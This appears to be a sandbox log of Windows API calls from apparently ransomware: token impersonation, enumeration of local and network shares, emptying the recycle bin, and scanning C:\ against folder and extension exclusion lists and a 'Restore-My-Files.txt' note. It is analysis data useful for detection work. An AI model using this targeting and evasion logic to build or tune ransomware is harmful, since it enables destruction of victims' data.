Process32NextW (in: hSnapshot=0x24c, lppe=0x330fcb0 | out: lppe=0x330fcb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x32c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0072.163] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x368) returned 0x250 [0072.163] OpenProcessToken (in: ProcessHandle=0x250, DesiredAccess=0xa, TokenHandle=0x330ff2c | out: TokenHandle=0x330ff2c*=0x254) returned 1 [0072.164] GetTokenInformation (in: TokenHandle=0x254, TokenInformationClass=0xa, TokenInformation=0x330fee0, TokenInformationLength=0x38, ReturnLength=0x330ff1c | out: TokenInformation=0x330fee0, ReturnLength=0x330ff1c) returned 1 [0072.164] DuplicateToken (in: ExistingTokenHandle=0x254, ImpersonationLevel=0x2, DuplicateTokenHandle=0x330ff28 | out: DuplicateTokenHandle=0x330ff28*=0x258) returned 1 [0072.164] SetThreadToken (Thread=0x0, Token=0x258) returned 1 [0072.164] CloseHandle (hObject=0x258) returned 1 [0072.164] CloseHandle (hObject=0x254) returned 1 [0072.164] CloseHandle (hObject=0x250) returned 1 [0072.164] CloseHandle (hObject=0x24c) returned 1 [0072.164] GetLogicalDrives () returned 0x2000004 [0072.164] GetDriveTypeW (lpRootPathName="Z:") returned 0x4 [0072.164] malloc (_Size=0x400) returned 0x20667f8 [0073.226] WNetGetConnectionW (in: lpLocalName="Z:", lpRemoteName=0x20667f8, lpnLength=0x330ff30 | out: lpRemoteName="\\\\192.168.0.1\\documents", lpnLength=0x330ff30) returned 0x0 [0075.632] PathRemoveBackslashW (in: pszPath="\\\\192.168.0.1\\documents" | out: pszPath="\\\\192.168.0.1\\documents") returned="s" [0075.632] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x408d60, lpParameter=0x20667f8, dwCreationFlags=0x0, lpThreadId=0x330ff2c | out: lpThreadId=0x330ff2c*=0xfc8) returned 0x340 [0075.633] wvsprintfA (in: param_1=0x330f9b0, param_2=" . Found REMOTE drive %S [%S]", arglist=0x330fef0 | out: param_1=" . Found REMOTE drive Z: [\\\\192.168.0.1\\documents]") returned 51 [0075.634] wsprintfA (in: param_1=0x330f9b0, param_2="%s\r\n" | out: param_1=" . Found REMOTE drive Z: [\\\\192.168.0.1\\documents]\r\n") returned 53 [0075.634] GetLocalTime (in: lpSystemTime=0x330feb0 | out: lpSystemTime=0x330feb0*(wYear=0x7e6, wMonth=0x6, wDayOfWeek=0x4, wDay=0x1e, wHour=0xe, wMinute=0x1c, wSecond=0x15, wMilliseconds=0xcc)) [0075.634] wsprintfA (in: param_1=0x330fdb0, param_2="[%.2u:%.2u:%.2u] " | out: param_1="[14:28:21] ") returned 11 [0075.634] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0075.634] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xa) returned 1 [0075.636] WriteConsoleA (in: hConsoleOutput=0x7, lpBuffer=0x330fdb0*, nNumberOfCharsToWrite=0xb, lpNumberOfCharsWritten=0x330fedc, lpReserved=0x0 | out: lpBuffer=0x330fdb0*, lpNumberOfCharsWritten=0x330fedc*=0xb) returned 1 [0075.637] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1 [0075.637] WriteConsoleA (in: hConsoleOutput=0x7, lpBuffer=0x330f9b0*, nNumberOfCharsToWrite=0x35, lpNumberOfCharsWritten=0x330fedc, lpReserved=0x0 | out: lpBuffer=0x330f9b0*, lpNumberOfCharsWritten=0x330fedc*=0x35) returned 1 [0075.638] GetDriveTypeW (lpRootPathName="C:") returned 0x3 [0075.638] WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x13, lpNetResource=0x0, lphEnum=0x330fee0 | out: lphEnum=0x330fee0*=0x2e3010) returned 0x0 [0075.641] WNetEnumResourceW (in: hEnum=0x2e3010, lpcCount=0x330fee4, lpBuffer=0x317970, lpBufferSize=0x330feec | out: lpcCount=0x330fee4, lpBuffer=0x317970, lpBufferSize=0x330feec) returned 0x0 [0075.641] WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x13, lpNetResource=0x317970, lphEnum=0x330feb8 | out: lphEnum=0x330feb8*=0x2e8188) returned 0x0 [0075.847] WNetEnumResourceW (in: hEnum=0x2e8188, lpcCount=0x330febc, lpBuffer=0x31e858, lpBufferSize=0x330fec4 | out: lpcCount=0x330febc, lpBuffer=0x31e858, lpBufferSize=0x330fec4) returned 0x103 [0075.848] WNetCloseEnum (hEnum=0x2e8188) returned 0x0 [0075.848] malloc (_Size=0x400) returned 0x206b458 [0075.848] lstrlenW (lpString="Microsoft Terminal Services") returned 27 [0075.848] memcpy (in: _Dst=0x206b458, _Src=0x31b938, _Size=0x38 | out: _Dst=0x206b458) returned 0x206b458 [0075.848] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x408d60, lpParameter=0x206b458, dwCreationFlags=0x0, lpThreadId=0x330fedc | out: lpThreadId=0x330fedc*=0xfd4) returned 0x2d0 [0075.849] WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x13, lpNetResource=0x317990, lphEnum=0x330feb8 | out: lphEnum=0x330feb8*=0x0) returned 0x4b8 [0095.905] malloc (_Size=0x400) returned 0x39800b8 [0095.905] lstrlenW (lpString="Microsoft Terminal Services") returned 27 [0095.905] memcpy (in: _Dst=0x39800b8, _Src=0x31b938, _Size=0x38 | out: _Dst=0x39800b8) returned 0x39800b8 [0095.905] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x408d60, lpParameter=0x39800b8, dwCreationFlags=0x0, lpThreadId=0x330fedc | out: lpThreadId=0x330fedc*=0xb88) returned 0x3a8 [0095.907] WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x13, lpNetResource=0x3179b0, lphEnum=0x330feb8 | out: lphEnum=0x330feb8*=0x0) returned 0x4c6 [0096.143] malloc (_Size=0x400) returned 0x20ac2e0 [0096.143] lstrlenW (lpString="Microsoft Terminal Services") returned 27 [0096.143] memcpy (in: _Dst=0x20ac2e0, _Src=0x31b938, _Size=0x38 | out: _Dst=0x20ac2e0) returned 0x20ac2e0 [0096.143] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x408d60, lpParameter=0x20ac2e0, dwCreationFlags=0x0, lpThreadId=0x330fedc | out: lpThreadId=0x330fedc*=0xb84) returned 0x3d0 [0096.145] WNetEnumResourceW (in: hEnum=0x2e3010, lpcCount=0x330fee4, lpBuffer=0x317970, lpBufferSize=0x330feec | out: lpcCount=0x330fee4, lpBuffer=0x317970, lpBufferSize=0x330feec) returned 0x103 [0096.146] WNetCloseEnum (hEnum=0x2e3010) returned 0x0 [0096.146] SetThreadToken (Thread=0x0, Token=0x0) returned 1 [0096.146] CloseHandle (hObject=0x248) returned 1 [0096.146] GetLogicalDrives () returned 0x4 [0096.146] GetDriveTypeW (lpRootPathName="C:") returned 0x3 [0096.146] WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x13, lpNetResource=0x0, lphEnum=0x330fee0 | out: lphEnum=0x330fee0*=0x2e3010) returned 0x0 [0096.146] WNetEnumResourceW (in: hEnum=0x2e3010, lpcCount=0x330fee4, lpBuffer=0x317970, lpBufferSize=0x330feec | out: lpcCount=0x330fee4, lpBuffer=0x317970, lpBufferSize=0x330feec) returned 0x0 [0096.146] WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x13, lpNetResource=0x317970, lphEnum=0x330feb8 | out: lphEnum=0x330feb8*=0x2cd128) returned 0x0 [0096.392] WNetEnumResourceW (in: hEnum=0x2cd128, lpcCount=0x330febc, lpBuffer=0x345890, lpBufferSize=0x330fec4 | out: lpcCount=0x330febc, lpBuffer=0x345890, lpBufferSize=0x330fec4) returned 0x103 [0096.392] WNetCloseEnum (hEnum=0x2cd128) returned 0x0 [0096.392] malloc (_Size=0x400) returned 0x206b860 [0096.392] lstrlenW (lpString="Microsoft Terminal Services") returned 27 [0096.392] memcpy (in: _Dst=0x206b860, _Src=0x31b938, _Size=0x38 | out: _Dst=0x206b860) returned 0x206b860 [0096.392] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x408d60, lpParameter=0x206b860, dwCreationFlags=0x0, lpThreadId=0x330fedc | out: lpThreadId=0x330fedc*=0x8f0) returned 0x3cc [0096.394] WNetOpenEnumW (dwScope=0x2, dwType=0x0, dwUsage=0x13, lpNetResource=0x317990, lphEnum=0x330feb8) Thread: id = 18 os_tid = 0xfbc [0072.175] wsprintfW (in: param_1=0x344fb28, param_2="%s\\*" | out: param_1="C:\\\\*") returned 5 [0072.175] FindFirstFileExW (in: lpFileName="C:\\\\*" (normalized: "c:\\*"), fInfoLevelId=0x0, lpFindFileData=0x344fd38, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x344fd38) returned 0x2dd868 [0072.175] malloc (_Size=0x410) returned 0x2066e20 [0072.175] memcpy (in: _Dst=0x2066e20, _Src=0x2060060, _Size=0x8 | out: _Dst=0x2066e20) returned 0x2066e20 [0073.228] SHEmptyRecycleBinW (hwnd=0x0, pszRootPath="C:\\", dwFlags=0x7) returned 0x8000ffff [0075.790] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x344f850, lpTotalNumberOfBytes=0x344f840, lpTotalNumberOfFreeBytes=0x344f848 | out: lpFreeBytesAvailableToCaller=0x344f850, lpTotalNumberOfBytes=0x344f840, lpTotalNumberOfFreeBytes=0x344f848) returned 1 [0075.790] StrFormatByteSize64A (in: qdw=0xf07ff000, pszBuf=0x7f, cchBuf=0x344f8c0 | out: pszBuf=0x7f) returned="511 GB" [0075.791] StrFormatByteSize64A (in: qdw=0x5b0bc000, pszBuf=0x7a, cchBuf=0x344f858 | out: pszBuf=0x7a) returned="489 GB" [0075.791] wsprintfA (in: param_1=0x344f928, param_2="%S %s total / %s free" | out: param_1="C:\\ 511 GB total / 489 GB free") returned 30 [0075.791] wvsprintfA (in: param_1=0x344f2d0, param_2="C:\\ 511 GB total / 489 GB free", arglist=0x344f810 | out: param_1="C:\\ 511 GB total / 489 GB free") returned 30 [0075.791] wsprintfA (in: param_1=0x344f2d0, param_2="%s\r\n" | out: param_1="C:\\ 511 GB total / 489 GB free\r\n") returned 32 [0075.791] GetLocalTime (in: lpSystemTime=0x344f7d0 | out: lpSystemTime=0x344f7d0*(wYear=0x7e6, wMonth=0x6, wDayOfWeek=0x4, wDay=0x1e, wHour=0xe, wMinute=0x1c, wSecond=0x15, wMilliseconds=0x168)) [0075.791] wsprintfA (in: param_1=0x344f6d0, param_2="[%.2u:%.2u:%.2u] " | out: param_1="[14:28:21] ") returned 11 [0075.791] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0075.791] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xa) returned 1 [0075.792] WriteConsoleA (in: hConsoleOutput=0x7, lpBuffer=0x344f6d0*, nNumberOfCharsToWrite=0xb, lpNumberOfCharsWritten=0x344f7fc, lpReserved=0x0 | out: lpBuffer=0x344f6d0*, lpNumberOfCharsWritten=0x344f7fc*=0xb) returned 1 [0075.792] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1 [0075.792] WriteConsoleA (in: hConsoleOutput=0x7, lpBuffer=0x344f2d0*, nNumberOfCharsToWrite=0x20, lpNumberOfCharsWritten=0x344f7fc, lpReserved=0x0 | out: lpBuffer=0x344f2d0*, lpNumberOfCharsWritten=0x344f7fc*=0x20) returned 1 [0075.793] wsprintfW (in: param_1=0x344f080, param_2="%s\\*" | out: param_1="C:\\\\*") returned 5 [0075.793] FindFirstFileExW (in: lpFileName="C:\\\\*" (normalized: "c:\\*"), fInfoLevelId=0x0, lpFindFileData=0x344f568, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x344f568) returned 0x2e3190 [0075.793] lstrcmpiW (lpString1=".", lpString2="$Recycle.Bin") returned 1 [0075.793] lstrcmpiW (lpString1="..", lpString2="$Recycle.Bin") returned 1 [0075.793] lstrcmpiW (lpString1="$Recycle.Bin", lpString2="$windows.~bt") returned -1 [0075.793] lstrcmpiW (lpString1="$Recycle.Bin", lpString2="intel") returned -1 [0075.793] lstrcmpiW (lpString1="$Recycle.Bin", lpString2="msocache") returned -1 [0075.793] lstrcmpiW (lpString1="$Recycle.Bin", lpString2="$recycle.bin") returned 0 [0075.793] FindNextFileW (in: hFindFile=0x2e3190, lpFindFileData=0x344f568 | out: lpFindFileData=0x344f568*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x9565de80, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28df6900, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28df6900, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Boot", cAlternateFileName="")) returned 1 [0075.794] lstrcmpiW (lpString1=".", lpString2="Boot") returned -1 [0075.794] lstrcmpiW (lpString1="..", lpString2="Boot") returned -1 [0075.794] lstrcmpiW (lpString1="Boot", lpString2="$windows.~bt") returned 1 [0075.794] lstrcmpiW (lpString1="Boot", lpString2="intel") returned -1 [0075.794] lstrcmpiW (lpString1="Boot", lpString2="msocache") returned -1 [0075.794] lstrcmpiW (lpString1="Boot", lpString2="$recycle.bin") returned 1 [0075.794] lstrcmpiW (lpString1="Boot", lpString2="$windows.~ws") returned 1 [0075.794] lstrcmpiW (lpString1="Boot", lpString2="tor browser") returned -1 [0075.794] lstrcmpiW (lpString1="Boot", lpString2="boot") returned 0 [0075.794] FindNextFileW (in: hFindFile=0x2e3190, lpFindFileData=0x344f568 | out: lpFindFileData=0x344f568*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0x9571c560, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28df6900, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x84a3bb2c, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x5db2a, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr", cAlternateFileName="")) returned 1 [0075.794] lstrcmpiW (lpString1=".", lpString2="bootmgr") returned -1 [0075.794] lstrcmpiW (lpString1="..", lpString2="bootmgr") returned -1 [0075.794] PathFindExtensionW (pszPath="bootmgr") returned="" [0075.794] lstrcmpiW (lpString1=".386", lpString2="") returned 1 [0075.794] lstrcmpiW (lpString1=".cmd", lpString2="") returned 1 [0075.794] lstrcmpiW (lpString1=".exe", lpString2="") returned 1 [0075.794] lstrcmpiW (lpString1=".ani", lpString2="") returned 1 [0075.794] lstrcmpiW (lpString1=".adv", lpString2="") returned 1 [0075.794] lstrcmpiW (lpString1=".theme", lpString2="") returned 1 [0075.794] lstrcmpiW (lpString1=".msi", lpString2="") returned 1 [0075.794] lstrcmpiW (lpString1=".msp", lpString2="") returned 1 [0075.794] lstrcmpiW (lpString1=".com", lpString2="") returned 1 [0075.794] lstrcmpiW (lpString1=".diagpkg", lpString2="") returned 1 [0075.794] lstrcmpiW (lpString1=".nls", lpString2="") returned 1 [0075.794] lstrcmpiW (lpString1=".diagcab", lpString2="") returned 1 [0075.794] lstrcmpiW (lpString1=".lock", lpString2="") returned 1 [0075.795] lstrcmpiW (lpString1=".ocx", lpString2="") returned 1 [0075.795] lstrcmpiW (lpString1=".mpa", lpString2="") returned 1 [0075.795] lstrcmpiW (lpString1=".cpl", lpString2="") returned 1 [0075.795] lstrcmpiW (lpString1=".mod", lpString2="") returned 1 [0075.795] lstrcmpiW (lpString1=".hta", lpString2="") returned 1 [0075.795] lstrcmpiW (lpString1=".icns", lpString2="") returned 1 [0075.795] lstrcmpiW (lpString1=".prf", lpString2="") returned 1 [0075.795] lstrcmpiW (lpString1=".rtp", lpString2="") returned 1 [0075.795] lstrcmpiW (lpString1=".diagcfg", lpString2="") returned 1 [0075.795] lstrcmpiW (lpString1=".msstyles", lpString2="") returned 1 [0075.795] lstrcmpiW (lpString1=".bin", lpString2="") returned 1 [0075.795] lstrcmpiW (lpString1=".hlp", lpString2="") returned 1 [0075.795] lstrcmpiW (lpString1=".shs", lpString2="") returned 1 [0075.795] lstrcmpiW (lpString1=".drv", lpString2="") returned 1 [0075.795] lstrcmpiW (lpString1=".wpx", lpString2="") returned 1 [0075.795] lstrcmpiW (lpString1=".bat", lpString2="") returned 1 [0075.795] lstrcmpiW (lpString1=".rom", lpString2="") returned 1 [0075.795] lstrcmpiW (lpString1=".msc", lpString2="") returned 1 [0075.795] lstrcmpiW (lpString1=".spl", lpString2="") returned 1 [0075.795] lstrcmpiW (lpString1=".ps1", lpString2="") returned 1 [0075.795] lstrcmpiW (lpString1=".msu", lpString2="") returned 1 [0075.795] lstrcmpiW (lpString1=".ics", lpString2="") returned 1 [0075.795] lstrcmpiW (lpString1=".key", lpString2="") returned 1 [0075.795] lstrcmpiW (lpString1=".mp3", lpString2="") returned 1 [0075.796] lstrcmpiW (lpString1=".reg", lpString2="") returned 1 [0075.796] lstrcmpiW (lpString1=".dll", lpString2="") returned 1 [0075.796] lstrcmpiW (lpString1=".ini", lpString2="") returned 1 [0075.796] lstrcmpiW (lpString1=".idx", lpString2="") returned 1 [0075.796] lstrcmpiW (lpString1=".sys", lpString2="") returned 1 [0075.796] lstrcmpiW (lpString1=".hlp", lpString2="") returned 1 [0075.796] lstrcmpiW (lpString1=".ico", lpString2="") returned 1 [0075.796] lstrcmpiW (lpString1=".lnk", lpString2="") returned 1 [0075.796] lstrcmpiW (lpString1=".rdp", lpString2="") returned 1 [0075.796] wsprintfW (in: param_1=0x344f4a0, param_2="%S" | out: param_1="Restore-My-Files.txt") returned 20 [0075.796] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="bootmgr") returned 1 [0075.796] lstrcmpiW (lpString1="ntldr", lpString2="bootmgr") returned 1 [0075.796] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="bootmgr") returned 1 [0075.796] lstrcmpiW (lpString1="bootsect.bak", lpString2="bootmgr") returned 1 [0075.796] lstrcmpiW (lpString1="autorun.inf", lpString2="bootmgr") returned -1 [0075.796] PathAddBackslashW (in: pszPath="C:\\" | out: pszPath="C:\\") returned="" [0075.796] FindNextFileW (in: hFindFile=0x2e3190, lpFindFileData=0x344f568 | out: lpFindFileData=0x344f568*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0x95957a00, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x95957a00, ftLastAccessTime.dwHighDateTime=0x1d70554, ftLastWriteTime.dwLowDateTime=0x95957a00, ftLastWriteTime.dwHighDateTime=0x1d70554, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x0, dwReserved1=0x0, cFileName="BOOTSECT.BAK", cAlternateFileName="")) returned 1 [0075.796] lstrcmpiW (lpString1=".", lpString2="BOOTSECT.BAK") returned -1 [0075.796] lstrcmpiW (lpString1="..", lpString2="BOOTSECT.BAK") returned -1 [0075.796] PathFindExtensionW (pszPath="BOOTSECT.BAK") returned=".BAK" [0075.796] lstrcmpiW (lpString1=".386", lpString2=".BAK") returned -1 [0075.796] lstrcmpiW (lpString1=".cmd", lpString2=".BAK") returned 1 [0075.796] lstrcmpiW (lpString1=".exe", lpString2=".BAK") returned 1 [0075.797] lstrcmpiW (lpString1=".ani", lpString2=".BAK") returned -1 [0075.797] lstrcmpiW (lpString1=".adv", lpString2=".BAK") returned -1 [0075.797] lstrcmpiW (lpString1=".theme", lpString2=".BAK") returned 1 [0075.797] lstrcmpiW (lpString1=".msi", lpString2=".BAK") returned 1 [0075.797] lstrcmpiW (lpString1=".msp", lpString2=".BAK") returned 1 [0075.797] lstrcmpiW (lpString1=".com", lpString2=".BAK") returned 1 [0075.797] lstrcmpiW (lpString1=".diagpkg", lpString2=".BAK") returned 1 [0075.797] lstrcmpiW (lpString1=".nls", lpString2=".BAK") returned 1 [0075.797] lstrcmpiW (lpString1=".diagcab", lpString2=".BAK") returned 1 [0075.797] lstrcmpiW (lpString1=".lock", lpString2=".BAK") returned 1 [0075.797] lstrcmpiW (lpString1=".ocx", lpString2=".BAK") returned 1 [0075.797] lstrcmpiW (lpString1=".mpa", lpString2=".BAK") returned 1 [0075.797] lstrcmpiW (lpString1=".cpl", lpString2=".BAK") returned 1 [0075.797] lstrcmpiW (lpString1=".mod", lpString2=".BAK") returned 1 [0075.797] lstrcmpiW (lpString1=".hta", lpString2=".BAK") returned 1 [0075.797] lstrcmpiW (lpString1=".icns", lpString2=".BAK") returned 1 [0075.797] lstrcmpiW (lpString1=".prf", lpString2=".BAK") returned 1 [0075.797] lstrcmpiW (lpString1=".rtp", lpString2=".BAK") returned 1 [0075.797] lstrcmpiW (lpString1=".diagcfg", lpString2=".BAK") returned 1 [0075.797] lstrcmpiW (lpString1=".msstyles", lpString2=".BAK") returned 1 [0075.797] lstrcmpiW (lpString1=".bin", lpString2=".BAK") returned 1 [0075.797] lstrcmpiW (lpString1=".hlp", lpString2=".BAK") returned 1 [0075.797] lstrcmpiW (lpString1=".shs", lpString2=".BAK") returned 1 [0075.797] lstrcmpiW (lpString1=".drv", lpString2=".BAK") returned 1 [0075.798] lstrcmpiW (lpString1=".wpx", lpString2=".BAK") returned 1 [0075.798] lstrcmpiW (lpString1=".bat", lpString2=".BAK") returned 1 [0075.798] lstrcmpiW (lpString1=".rom", lpString2=".BAK") returned 1 [0075.798] lstrcmpiW (lpString1=".msc", lpString2=".BAK") returned 1 [0075.798] lstrcmpiW (lpString1=".spl", lpString2=".BAK") returned 1 [0075.798] lstrcmpiW (lpString1=".ps1", lpString2=".BAK") returned 1 [0075.798] lstrcmpiW (lpString1=".msu", lpString2=".BAK") returned 1 [0075.798] lstrcmpiW (lpString1=".ics", lpString2=".BAK") returned 1 [0075.798] lstrcmpiW (lpString1=".key", lpString2=".BAK") returned 1 [0075.798] lstrcmpiW (lpString1=".mp3", lpString2=".BAK") returned 1 [0075.798] lstrcmpiW (lpString1=".reg", lpString2=".BAK") returned 1 [0075.798] lstrcmpiW (lpString1=".dll", lpString2=".BAK") returned 1 [0075.798] lstrcmpiW (lpString1=".ini", lpString2=".BAK") returned 1 [0075.798] lstrcmpiW (lpString1=".idx", lpString2=".BAK") returned 1 [0075.798] lstrcmpiW (lpString1=".sys", lpString2=".BAK") returned 1 [0075.798] lstrcmpiW (lpString1=".hlp", lpString2=".BAK") returned 1 [0075.798] lstrcmpiW (lpString1=".ico", lpString2=".BAK") returned 1 [0075.798] lstrcmpiW (lpString1=".lnk", lpString2=".BAK") returned 1 [0075.798] lstrcmpiW (lpString1=".rdp", lpString2=".BAK") returned 1 [0075.798] wsprintfW (in: param_1=0x344f4a0, param_2="%S" | out: param_1="Restore-My-Files.txt") returned 20 [0075.798] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BOOTSECT.BAK") returned 1 [0075.798] lstrcmpiW (lpString1="ntldr", lpString2="BOOTSECT.BAK") returned 1 [0075.798] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BOOTSECT.BAK") returned 1 [0075.798] lstrcmpiW (lpString1="bootsect.bak", lpString2="BOOTSECT.BAK") returned 0 [0075.799] FindNextFileW (in: hFindFile=0x2e3190, lpFindFileData=0x344f568 | out: lpFindFileData=0x344f568*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents and Settings", cAlternateFileName="DOCUME~1")) returned 1 [0075.799] lstrcmpiW (lpString1=".", lpString2="Documents and Settings") returned -1 [0075.799] lstrcmpiW (lpString1="..", lpString2="Documents and Settings") returned -1 [0075.799] lstrcmpiW (lpString1="Documents and Settings", lpString2="$windows.~bt") returned 1 [0075.799] lstrcmpiW (lpString1="Documents and Settings", lpString2="intel") returned -1 [0075.799] lstrcmpiW (lpString1="Documents and Settings", lpString2="msocache") returned -1 [0075.799] lstrcmpiW (lpString1="Documents and Settings", lpString2="$recycle.bin") returned 1 [0075.799] lstrcmpiW (lpString1="Documents and Settings", lpString2="$windows.~ws") returned 1 [0075.799] lstrcmpiW (lpString1="Documents and Settings", lpString2="tor browser") returned -1 [0075.799] lstrcmpiW (lpString1="Documents and Settings", lpString2="boot") returned 1 [0075.799] lstrcmpiW (lpString1="Documents and Settings", lpString2="system volume information") returned -1 [0075.799] lstrcmpiW (lpString1="Documents and Settings", lpString2="perflogs") returned -1 [0075.799] lstrcmpiW (lpString1="Documents and Settings", lpString2="google") returned -1 [0075.799] lstrcmpiW (lpString1="Documents and Settings", lpString2="application data") returned 1 [0075.799] lstrcmpiW (lpString1="Documents and Settings", lpString2="windows") returned -1 [0075.799] lstrcmpiW (lpString1="Documents and Settings", lpString2="windows.old") returned -1 [0075.799] lstrcmpiW (lpString1="Documents and Settings", lpString2="appdata") returned 1 [0075.799] lstrcmpiW (lpString1="Documents and Settings", lpString2="Windows nt") returned -1 [0076.550] lstrcmpiW (lpString1="Documents and Settings", lpString2="Msbuild") returned -1 [0076.550] lstrcmpiW (lpString1="Documents and Settings", lpString2="Microsoft") returned -1 [0076.550] lstrcmpiW (lpString1="Documents and Settings", lpString2="All users") returned 1 [0076.550] lstrcmpiW (lpString1="Documents and Settings", lpString2="mozilla") returned -1 [0076.550] wsprintfW (in: param_1=0x344f080, param_2="%s\\%s" | out: param_1="C:\\\\Documents and Settings") returned 26 [0076.550] wsprintfW (in: param_1=0x344e8e0, param_2="%s\\*" | out: param_1="C:\\\\Documents and Settings\\*") returned 28 [0076.550] FindFirstFileExW (in: lpFileName="C:\\\\Documents and Settings\\*" (normalized: "c:\\documents and settings\\*"), fInfoLevelId=0x0, lpFindFileData=0x344edc8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x344edc8) returned 0xffffffff [0076.552] FindNextFileW (in: hFindFile=0x2e3190, lpFindFileData=0x344f568 | out: lpFindFileData=0x344f568*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0xa384ad20, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0xa384ad20, ftLastAccessTime.dwHighDateTime=0x1d70554, ftLastWriteTime.dwLowDateTime=0x7e17c7a0, ftLastWriteTime.dwHighDateTime=0x1d87cc9, nFileSizeHigh=0x0, nFileSizeLow=0x5ff9d000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hiberfil.sys", cAlternateFileName="")) returned 1 [0076.552] lstrcmpiW (lpString1=".", lpString2="hiberfil.sys") returned -1 [0076.552] lstrcmpiW (lpString1="..", lpString2="hiberfil.sys") returned -1 [0076.552] PathFindExtensionW (pszPath="hiberfil.sys") returned=".sys" [0076.552] lstrcmpiW (lpString1=".386", lpString2=".sys") returned -1 [0076.552] lstrcmpiW (lpString1=".cmd", lpString2=".sys") returned -1 [0076.552] lstrcmpiW (lpString1=".exe", lpString2=".sys") returned -1 [0076.552] lstrcmpiW (lpString1=".ani", lpString2=".sys") returned -1 [0076.552] lstrcmpiW (lpString1=".adv", lpString2=".sys") returned -1 [0076.552] lstrcmpiW (lpString1=".theme", lpString2=".sys") returned 1 [0076.552] lstrcmpiW (lpString1=".msi", lpString2=".sys") returned -1 [0076.552] lstrcmpiW (lpString1=".msp", lpString2=".sys") returned -1 [0076.552] lstrcmpiW (lpString1=".com", lpString2=".sys") returned -1 [0076.552] lstrcmpiW (lpString1=".diagpkg", lpString2=".sys") returned -1 [0076.553] lstrcmpiW (lpString1=".nls", lpString2=".sys") returned -1 [0076.553] lstrcmpiW (lpString1=".diagcab", lpString2=".sys") returned -1 [0076.553] lstrcmpiW (lpString1=".lock", lpString2=".sys") returned -1 [0076.553] lstrcmpiW (lpString1=".ocx", lpString2=".sys") returned -1 [0076.553] lstrcmpiW (lpString1=".mpa", lpString2=".sys") returned -1 [0076.553] lstrcmpiW (lpString1=".cpl", lpString2=".sys") returned -1 [0076.553] lstrcmpiW (lpString1=".mod", lpString2=".sys") returned -1 [0076.553] lstrcmpiW (lpString1=".hta", lpString2=".sys") returned -1 [0076.553] lstrcmpiW (lpString1=".icns", lpString2=".sys") returned -1 [0076.553] lstrcmpiW (lpString1=".prf", lpString2=".sys") returned -1 [0076.553] lstrcmpiW (lpString1=".rtp", lpString2=".sys") returned -1 [0076.553] lstrcmpiW (lpString1=".diagcfg", lpString2=".sys") returned -1 [0076.553] lstrcmpiW (lpString1=".msstyles", lpString2=".sys") returned -1 [0076.553] lstrcmpiW (lpString1=".bin", lpString2=".sys") returned -1 [0076.553] lstrcmpiW (lpString1=".hlp", lpString2=".sys") returned -1 [0076.553] lstrcmpiW (lpString1=".shs", lpString2=".sys") returned -1 [0076.553] lstrcmpiW (lpString1=".drv", lpString2=".sys") returned -1 [0076.553] lstrcmpiW (lpString1=".wpx", lpString2=".sys") returned 1 [0076.553] 